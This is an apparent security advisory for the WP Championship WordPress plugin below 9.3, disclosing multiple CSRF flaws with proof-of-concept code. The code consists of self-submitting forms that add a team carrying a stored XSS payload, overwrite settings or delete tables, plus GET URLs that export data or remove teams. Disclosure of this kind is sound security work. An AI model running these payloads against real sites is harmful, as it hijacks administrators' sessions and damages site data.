Lucene search
Daniel RufWPEX-ID:02D25736-C796-49BD-B774-66E0E3FCF4C9HistoryJun 16, 2022 - 12:00 a.m.
WP Championship < 9.3 - Multiple CSRF
2022-06-1600:00:00
Daniel Ruf
124
wordpress
championship
csrf
security
form
admin
script
EPSS
0.001
Percentile
26.3%
The plugin is lacking CSRF checks in various places, allowing attackers to make a logged in admin perform unwanted actions, such as create and delete arbitrary teams as well as update the plugin’s settings. Due to the lack of sanitisation and escaping, it could also lead to Stored Cross-Site Scripting issues
<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin_team.php#" method="POST">
<input type="text" name="action" value="addteam">
<input type="text" name="team_name" value="<img src=x onerror=alert(/XSS/)>">
<input type="text" name="team_shortname" value="test">
<input type="text" name="team_icon" value="b">
<input type="text" name="group" value="A">
<input type="text" name="qualified" value="0">
<input type="text" name="penalty" value="0">
<input type="hidden" id="submit" name="submit" value="Mannschaft hinzufügen »">
</form>
<script>
HTMLFormElement.prototype.submit.call(
document.getElementById("test")
);
</script>
https://example.com/wp-admin/admin-ajax.php?action=wpc_export&dlmode=true&exmode=team&fnmode=false
<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin.php#" method="POST">
<input type="text" name="action" value="update">
<input type="text" name="cs_groups" value="8">
<input type="text" name="cs_pts_winner" value="3">
<input type="text" name="cs_pts_looser" value="0">
<input type="text" name="cs_pts_deuce" value="1">
<input type="text" name="cs_group_teams" value="2">
<input type="text" name="deltables_ok" value="1">
<input type="text" name="deltables" value="Tabellen entfernen »">
<input type="text" name="cs_pts_tipp" value="1">
<input type="text" name="cs_pts_tendency" value="1">
<input type="text" name="cs_stellv_schalter" value="1">
<input type="text" name="cs_pts_supertipp" value="5">
<input type="text" name="cs_modus" value="1">
<input type="text" name="cs_pts_champ" value="1">
<input type="text" name="cs_oneside_tendency" value="0">
<input type="text" name="cs_pts_oneside" value="0">
<input type="text" name="cs_reminder_hours" value="">
<input type="text" name="cs_goalsum" value="-1">
<input type="text" name="cs_rank_trend" value="1">
<input type="text" name="cs_final_winner" value="-1">
<input type="text" name="cs_pts_goalsum" value="0">
<input type="text" name="cs_floating_link" value="1">
<input type="text" name="cs_joker_idlist" value="">
<input type="text" name="cs_joker_player" value="">
<input type="text" name="cs_number_of_tippdays" value="">
<input type="text" name="cs_xmlrpc_news" value=" ">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin.php#" method="POST">
<input type="text" name="action" value="update">
<input type="text" name="cs_groups" value="8">
<input type="text" name="cs_pts_winner" value="3">
<input type="text" name="mailservice_ok" value="1">
<input type="text" name="mailservice1" value="Mailservice auslösen »">
<input type="text" name="cs_pts_looser" value="0">
<input type="text" name="cs_pts_deuce" value="1">
<input type="text" name="cs_group_teams" value="2">
<input type="text" name="cs_pts_tipp" value="1">
<input type="text" name="cs_pts_tendency" value="1">
<input type="text" name="cs_stellv_schalter" value="1">
<input type="text" name="cs_pts_supertipp" value="5">
<input type="text" name="cs_modus" value="1">
<input type="text" name="cs_pts_champ" value="1">
<input type="text" name="cs_oneside_tendency" value="0">
<input type="text" name="cs_pts_oneside" value="0">
<input type="text" name="cs_reminder_hours" value="">
<input type="text" name="cs_goalsum" value="-1">
<input type="text" name="cs_rank_trend" value="1">
<input type="text" name="cs_final_winner" value="-1">
<input type="text" name="cs_pts_goalsum" value="0">
<input type="text" name="cs_floating_link" value="1">
<input type="text" name="cs_joker_idlist" value="">
<input type="text" name="cs_joker_player" value="">
<input type="text" name="cs_number_of_tippdays" value="">
<input type="text" name="cs_xmlrpc_news" value=" ">
</form>
<script>
document.getElementById("test").submit();
</script>
https://example.com/wp-admin/admin.php?page=wp-championship/cs_admin_team.php&action=remove&tid=1
https://example.com/wp-admin/admin.php?page=wp-championship/cs_admin_finals.php&action=remove&mid=1Related
wpvulndb
wpvulndb
WP Championship < 9.3 - Multiple CSRF
2022-06-16 00:00:00
patchstack
patchstack
cvelist
cvelist
CVE-2022-1967 WP Championship < 9.3 - Multiple CSRF
2022-07-04 13:05:56
prion
prion
Cross site scripting
2022-07-04 13:15:00
nvd
nvd
CVE-2022-1967
2022-07-04 13:15:08
cve
cve
CVE-2022-1967
2022-07-04 13:15:08
cnvd
cnvd
WordPress WP Championship plugin跨站请求伪造漏洞
2022-07-06 00:00:00